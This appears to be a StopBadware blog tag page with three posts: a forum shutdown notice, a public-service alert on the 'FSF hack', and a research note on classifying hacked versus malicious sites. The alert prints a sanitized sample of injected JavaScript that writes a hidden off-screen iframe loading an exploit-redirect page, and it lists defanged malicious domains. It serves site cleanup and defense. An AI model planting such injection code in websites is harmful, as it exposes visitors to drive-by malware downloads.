hacked sites | StopBadware

hacked sites

hacked sites

StopBadware shutting down community forum BadwareBusters.org

Posted on February 24, 2015 - 13:43 by ccondon

It's been nearly six years to the day since StopBadware and its partners launched BadwareBusters.org, our community platform for those who wanted to learn about and prevent badware. Over the years, the forum has helped thousands of website owners clean up hacked websites. Dozens of security experts have volunteered their time and talent to examine compromised sites, offer advice, and guide users to the best security resources for their needs. BadwareBusters has been exactly what it was intended to be when it launched in 2009: a place for our community to define its own needs, share stories, and learn from each other's experiences. 

At the end of this month, StopBadware will be shutting down the forum. We're terribly proud of all that our community has accomplished these past six years; we don't take lightly the decision to close up shop, but limited resources mean StopBadware is no longer able to maintain the forum in a way that's fair and productive for users. 

We're confident those seeking help with hacked sites and malware cleanup can find what they're searching for in places such as Google's malware forum, Bleeping Computer's forums, or Stack Exchange's community Q&As. StopBadware's hacked sites resources section also has useful tools and tutorials on finding and removing website malware, and longtime BadwareBusters moderator RedLeg maintains a gem of a site on website cleanup. 

Thanks for your participation and your wisdom. Keep learning.

'Free Software Foundation' hack

Posted on October 31, 2014 - 11:30 by ccondon

Happy Halloween, everyone! This is a PSA from the StopBadware website testing team. Our testers have recently been seeing dozens of sites hacked with a malicious iframe that loads content from from very bad places. We're referring to this as the FSF hack. 

Here is an example of the (sanitized) bad code:

/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf. org/ */ function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="hxxp://faskarao. arawat. com/welcometo15. html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></ifr'+'ame>'); } } JeckPostal(); /*

What does it do? This creates an off-screen iframe that loads content from a site which is usually a redirect to an exploit. The site from which the content is being loaded often has randomly generated hex strings in front of the domain. For example:

hxxp://c22c38348. bigbozz. org
hxxp://309fd22fa. aerofitstudio. net
hxxp://ed757fc56. azov-sportschool2. ru

These sites commonly redirect to maliciously registered pages which attempt to download something onto the user's PC.

Where is it found? This is typically injected at the beginning of JavaScript files loaded into your HTML. It will usually be before any other type of copyright information, and is nearly always preceded by the "2007 Free Software Foundation" comment. 

RedLeg, one of our community forum mods, has a fantastic, very detailed writeup of this hack. If your site is hacked, take a look at RedLeg's info, our tutorials, and these resources to help you clean up!

Thanks to our superstar testing intern Blake for the tip on this one!

Classifying sites as hacked or malicious

Posted on July 24, 2014 - 14:34 by ccondon

For the past several months, StopBadware's research team has been paying special attention to ways we can differentiate and track certain categories of infected websites. Thousands of website review requests are submitted to us every month; most of these are for hacked legitimate sites whose owners are concerned with cleaning up malware infections and protecting visitors. Some, however, are maliciously registered sites, or sites whose owners are abusing free hosting or dynamic DNS services to spread malware. When we encounter malicious sites like this, we want to make sure they stay on blacklists, and we want to be able to report them to people who can help take them down.

One of the first steps in doing that is developing a big picture understanding of the kinds of sites we encounter over time. Our team tracked the sites we tested manually (this is a relatively small percentage of the total number of review requests submitted to us) from late March to mid-July 2014. 

Because of the nature of infection chains, we differentiate between several types of sites when determining intention. Unsurprisingly, most of the sites we see are legitimate sites that have been hacked for use as landing pages (e.g., compromised with a malicious iframe, script, or http redirect). Exploit pages, of course, are almost always malicious by design, as they contain the malicious executable that infects the target machine with badware. StopBadware sees very few exploit pages; this is largely a result of our testing IPs being blocked by malware distributors. 

Note: Generally speaking, we consider sites that fall into the "free host" category to be malicious. This is not necessarily a comment on the practices or intentions of free hosting (or other free service) providers—many of whom are operating in good faith and some of whom have worked with us for years to curb abuse on their platforms—but rather a result of the fact that bad actors routinely abuse free services to spread malware. 

The most interesting category we examined was intermediary pages. Our researchers classified intermediary sites as hacked or malicious by looking at a number of factors, including WHOIS data, the page's accessibility, and whether the site has legitimate content. This type of analysis is a common practice in the security industry, but it's also rather resource-intensive—especially for a small nonprofit. 

Ideally, we'd like to be able to automatically classify malicious websites so we can make the Web safer and minimize abuse of our processes at the same time. Over the next few weeks, our team will be using our data and a third-party service to come up with an experimental classifier for malicious vs. hacked sites. We look forward to sharing additional data and results once the project is finished; in the meantime, advice from those with experience in this arena is welcome! 

*Special thanks to our outstanding research and testing intern, Luke Oglesbee, for his work on this!